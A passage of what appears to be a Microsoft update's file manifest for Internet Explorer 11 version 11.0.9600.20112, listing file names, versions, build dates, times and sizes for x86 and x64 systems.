11.0.9600.20112| 19-Aug-2021| 18:37| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 3,584 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 3,584 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 3,584 \nDiagnosticsTap.dll| 11.0.9600.20112| 13-Aug-2021| 19:48| 175,104 \nF12Resources.dll| 11.0.9600.20112| 13-Aug-2021| 20:10| 10,948,096 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 2,048 \nF12Tools.dll| 11.0.9600.20112| 13-Aug-2021| 19:47| 256,000 \nF12.dll| 11.0.9600.20112| 13-Aug-2021| 19:39| 1,207,808 \nmsfeeds.dll| 11.0.9600.20112| 13-Aug-2021| 19:35| 696,320 \nmsfeeds.mof| Not versioned| 13-Aug-2021| 18:11| 1,518 \nmsfeedsbs.mof| Not versioned| 13-Aug-2021| 18:11| 1,574 \nmsfeedsbs.dll| 11.0.9600.20112| 13-Aug-2021| 19:42| 52,736 \nmsfeedssync.exe| 11.0.9600.20112| 13-Aug-2021| 20:04| 11,776 \nhtml.iec| 2019.0.0.20112| 13-Aug-2021| 20:03| 341,504 \nmshtmled.dll| 11.0.9600.20112| 13-Aug-2021| 19:41| 76,800 \nmshtmlmedia.dll| 11.0.9600.20112| 13-Aug-2021| 19:33| 1,155,584 \nmshtml.dll| 11.0.9600.20112| 13-Aug-2021| 20:33| 20,294,144 \nmshtml.tlb| 11.0.9600.20112| 13-Aug-2021| 20:13| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 13-Aug-2021| 18:03| 3,228 \nieetwcollector.exe| 11.0.9600.20112| 13-Aug-2021| 19:56| 104,960 \nieetwproxystub.dll| 11.0.9600.20112| 13-Aug-2021| 20:03| 47,616 \nieetwcollectorres.dll| 11.0.9600.20112| 13-Aug-2021| 20:13| 4,096 \nielowutil.exe| 11.0.9600.20112| 13-Aug-2021| 19:57| 221,184 \nieproxy.dll| 11.0.9600.20112| 13-Aug-2021| 19:14| 310,784 \nIEShims.dll| 11.0.9600.20112| 13-Aug-2021| 19:18| 290,304 \nWindows Pop-up Blocked.wav| Not versioned| 20-Mar-2021| 21:02| 85,548 \nWindows Information Bar.wav| Not versioned| 20-Mar-2021| 21:02| 23,308 \nWindows Feed Discovered.wav| Not versioned| 20-Mar-2021| 21:02| 19,884 \nWindows Navigation Start.wav| Not versioned| 20-Mar-2021| 21:02| 11,340 \nbing.ico| Not versioned| 20-Mar-2021| 20:55| 5,430 \nieUnatt.exe| 11.0.9600.20112| 13-Aug-2021| 19:56| 115,712 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 19-Aug-2021| 20:18| 2,956 \njsprofilerui.dll| 11.0.9600.20112| 13-Aug-2021| 19:43| 579,584 \nMemoryAnalyzer.dll| 11.0.9600.20112| 13-Aug-2021| 19:53| 1,399,296 \nMshtmlDac.dll| 11.0.9600.20112| 13-Aug-2021| 20:02| 64,000 \nnetworkinspection.dll| 11.0.9600.20112| 13-Aug-2021| 19:39| 1,075,200 \noccache.dll| 11.0.9600.20112| 13-Aug-2021| 19:40| 130,048 \ndesktop.ini| Not versioned| 20-Mar-2021| 20:54| 65 \nwebcheck.dll| 11.0.9600.20112| 13-Aug-2021| 19:35| 230,400 \ndesktop.ini| Not versioned| 20-Mar-2021| 20:54| 65 \nmsrating.dll| 11.0.9600.20112| 13-Aug-2021| 19:43| 168,960 \nicrav03.rat| Not versioned| 20-Mar-2021| 20:54| 8,798 \nticrf.rat| Not versioned| 20-Mar-2021| 20:54| 1,988 \niertutil.dll| 11.0.9600.20112| 13-Aug-2021| 20:07| 2,308,608 \nsqmapi.dll| 6.2.9200.16384| 19-Aug-2021| 18:17| 228,232 \nie4uinit.exe| 11.0.9600.20112| 13-Aug-2021| 19:34| 692,224 \niernonce.dll| 11.0.9600.20112| 13-Aug-2021| 19:58| 30,720 \niesetup.dll| 11.0.9600.20112| 13-Aug-2021| 20:04| 62,464 \nieuinit.inf| Not versioned| 13-Aug-2021| 18:56| 16,303 \ninseng.dll| 11.0.9600.20112| 13-Aug-2021| 19:44| 91,136 \nTimeline.dll| 11.0.9600.20112| 13-Aug-2021| 19:43| 154,112 \nTimeline_is.dll| 11.0.9600.20112| 13-Aug-2021| 19:58| 124,928 \nTimeline.cpu.xml| Not versioned| 20-Mar-2021| 20:54| 3,197 \nVGX.dll| 11.0.9600.20112| 13-Aug-2021| 19:41| 818,176 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 2,066,432 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 2,121,216 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 2,075,648 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 2,063,872 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 2,314,240 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 2,390,528 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 2,033,152 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 2,307,584 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 2,255,872 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 2,061,312 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 2,326,016 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 2,019,840 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 2,071,040 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 2,082,816 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 2,307,584 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 2,170,368 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 2,153,984 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 2,291,712 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 2,283,520 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 2,052,096 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 2,301,952 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 2,093,056 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 2,075,648 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 2,299,392 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 2,094,592 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 2,316,800 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 2,305,536 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 2,278,912 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 2,285,568 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 2,060,288 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 2,315,776 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 2,279,424 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 2,324,992 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 2,098,176 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 1,890,304 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 1,890,304 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 3,072 \nieframe.dll| 11.0.9600.20112| 13-Aug-2021| 19:47| 13,881,856 \nieui.dll| 11.0.9600.20112| 13-Aug-2021| 19:58| 476,160 \nieframe.ptxml| Not versioned| 13-Aug-2021| 18:03| 24,486 \nieinstal.exe| 11.0.9600.20112| 13-Aug-2021| 19:41| 475,648 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:18| 463,373 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:18| 751,393 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:19| 526,345 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:20| 499,704 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:20| 552,385 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:21| 944,608 \nInetRes.adml| Not versioned| 19-Aug-2021| 20:19| 457,561 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:22| 543,996 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:22| 751,291 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:23| 526,607 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:24| 575,888 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:24| 463,373 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:25| 751,492 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:26| 570,786 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:26| 548,169 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:27| 639,283 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:28| 525,516 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:28| 751,380 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:29| 751,403 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:30| 488,537 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:30| 548,546 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:31| 559,391 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:32| 535,116 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:32| 541,506 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:33| 751,385 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:34| 804,522 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:34| 751,502 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:35| 751,349 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:35| 751,327 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:36| 503,959 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:37| 751,523 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:37| 521,630 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:38| 751,288 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:39| 420,094 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:39| 436,663 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:40| 436,663 \ninetres.admx| Not versioned| 20-Mar-2021| 21:22| 1,678,023 \nMsSpellCheckingFacility.exe| 6.3.9600.20112| 13-Aug-2021| 19:51| 668,672 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 29,184 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 32,768 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 33,280 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 35,328 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 37,888 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 34,304 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 33,280 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 34,304 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 27,648 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 34,304 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 33,792 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 23,040 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 22,016 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 31,232 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 34,304 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 35,840 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 32,768 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 33,280 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 34,816 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 33,280 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 32,256 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 32,768 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 30,720 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 16,384 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 16,896 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 16,896 \njscript9.dll| 11.0.9600.20112| 13-Aug-2021| 19:52| 4,119,040 \njscript9diag.dll| 11.0.9600.20112| 13-Aug-2021| 19:55| 620,032 \njscript.dll| 5.8.9600.20112| 13-Aug-2021| 19:56| 653,824 \nvbscript.dll| 5.8.9600.20112| 13-Aug-2021| 20:04| 498,176 \n \n### \n\n__\n\nInternet Explorer 11 on all supported x64-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nurlmon.dll| 11.0.9600.20112| 13-Aug-2021| 19:28| 1,562,624 \niexplore.exe| 11.0.9600.20112| 19-Aug-2021| 19:48| 810,376 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:49| 31,744 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:50| 36,352 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:50| 35,328 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:51| 34,816 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:51| 36,864 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:52| 39,424 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:53| 32,768 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:53| 37,376 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:53| 33,280 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:54| 34,816 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:55| 38,400 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:55| 30,720 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:56| 34,816 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:57| 35,328 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:57| 36,864 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:58| 25,600 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:59| 24,576 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:59| 35,840 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:00| 34,304 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:00| 34,304 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:01| 36,352 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:02| 35,840 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:02| 34,816 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:03| 35,840 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:04| 35,840 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:04| 34,304 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:05| 35,840 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:05| 34,816 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:06| 34,816 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:07| 34,816 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:08| 33,280 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:08| 34,304 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:09| 34,304 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:10| 20,992 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:10| 21,504 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:11| 21,504 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:49| 46,592 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:50| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:50| 51,200 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:51| 51,200 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:51| 56,320 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:52| 57,856 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:53| 49,664 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:53| 54,272 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:53| 47,616 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:54| 49,152 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:55| 55,296 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:55| 45,056 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:56| 51,712 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:57| 51,712 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:57| 53,248 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:58| 39,424 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:59| 35,840 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:59| 50,176 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:00| 51,200 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:00| 50,688 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:01| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:02| 53,760 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:02| 54,272 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:03| 54,272 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:04| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:04| 51,200 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:05| 53,248 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:05| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:06| 51,712 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:07| 50,688 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:07| 50,688 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:08| 50,176 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:09| 50,176 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:09| 30,720 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:10| 30,720 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:11| 30,720 \ninetcpl.cpl| 11.0.9600.20112| 13-Aug-2021| 19:40| 2,132,992 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:49| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:50| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:50| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:51| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:52| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:52| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:53| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:53| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:53| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:54| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:55| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:55| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:56| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:57| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:57|